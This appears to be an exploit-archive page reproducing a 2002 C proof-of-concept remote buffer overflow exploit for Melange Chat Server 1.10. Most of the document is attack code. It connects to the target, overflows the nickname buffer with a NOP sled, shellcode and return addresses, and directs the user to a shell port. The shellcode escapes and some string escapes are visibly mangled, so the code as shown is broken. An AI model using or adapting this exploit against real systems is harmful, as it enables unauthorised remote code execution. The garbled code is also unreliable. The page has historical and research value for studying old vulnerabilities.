[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Melange Chat Server 1.10 Remote Buffer Overflow Exploit
# Published : 2002-12-24
# Author : innerphobia
# Previous Title : MS Windows WebDAV (ntdll.dll) Remote Exploit
# Next Title : Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass
/*
Proof of Concept for Melange Chat Server 1.10
a lame remote bof exploit by innerphobia <up2u_@hotmail.com> 12/24/02
Credits go to:
- iDefense Labs for the advisory
- blink for discovering the bug
- Irian for the shellcode
With careful calculation it is *possible* to control even the EIP,
not just one byte of EIP.
There are to a few things that will happen if we use a wrong ret address:
1. Seg fault / shut down.
2. Keep on going < nothing happens >.
Code tested on Suse 8.0 and RH 7.3
Merry Xmas :)
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
// magic numbers begin here
#define ADDR 0xbfffd490
#define NICKLEN 49
#define BUFFLEN 463
// magic numbers end
// brutally copied from Irian's cy.c
char evil[]=
"x31xdbxf7xe3x53x43x53x6ax02x89xe1xb0x66x52x50xcdx80x43"
"x66x53x89xe1x6ax10x51x50x89xe1x52x50xb0x66xcdx80x89xe1xb3x04"
"xb0x66xcdx80x43xb0x66xcdx80x89xd9x93xb0x3fxcdx80x49x79xf9x52"
"x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x52x53x89xe1xb0x0bxcdx80";
int main(int argc,char **argv){
int i,j=0,sock,port = 6666;
char *host;
char nick[NICKLEN],buff[BUFFLEN];
struct hostent *htent;
struct sockaddr_in serv_addr;
long jump = ADDR;
u_long *ptr = (u_long *)buff;
if(argc>4||argc<2)
printf("Usage : %s [hostname] [ret address in hex (0x41414141)]
[port]n",argv[0]),exit(1);
host=argv[1];
if(argc>2) sscanf(argv[2],"0x%lx",&jump);
if(argc>3) port=atoi(argv[3]);
if((htent = gethostbyname(argv[1])) != NULL && (sock =
socket(AF_INET,SOCK_STREAM,0)) != -1){
serv_addr.sin_family = AF_INET;
memcpy((char
*)&serv_addr.sin_addr.s_addr,htent->h_addr_list[0],htent->h_length);
serv_addr.sin_port = htons(port);
if(!connect(sock,(struct sockaddr *)&serv_addr,sizeof(serv_addr))){
printf("Connected to %s at %d [0x%lx]nTrying to send %d chars
NICKNAMEn",host,port,jump,sizeof(nick)-6);
memset(nick,'A',sizeof(nick)),memcpy(nick,"/NICK ",6);
if(send(sock,nick,sizeof(nick),0) == -1)
perror("Sending nickname failedn"),exit(1);
sleep(1);
for(i=0;i<sizeof(buff);i+=4) *(ptr++)=jump;
for(i=0;i<sizeof(buff)-200-strlen(evil);i++) buff[i]=0x90;
for(j=0;j<strlen(evil);j++) buff[i++]=evil[j];
printf("Trying to send overflow stringn");
if(send(sock,buff,sizeof(buff),0) == -1)
perror("Sending overflow failed :(n"),exit(1);
sleep(1);
printf("Now try to connect to host : %s port : 26112n",host);
close(sock);
}
else printf("Can't connect to %s at %dn",host,port),exit(1);
}
}
// www.Syue.com [2002-12-24]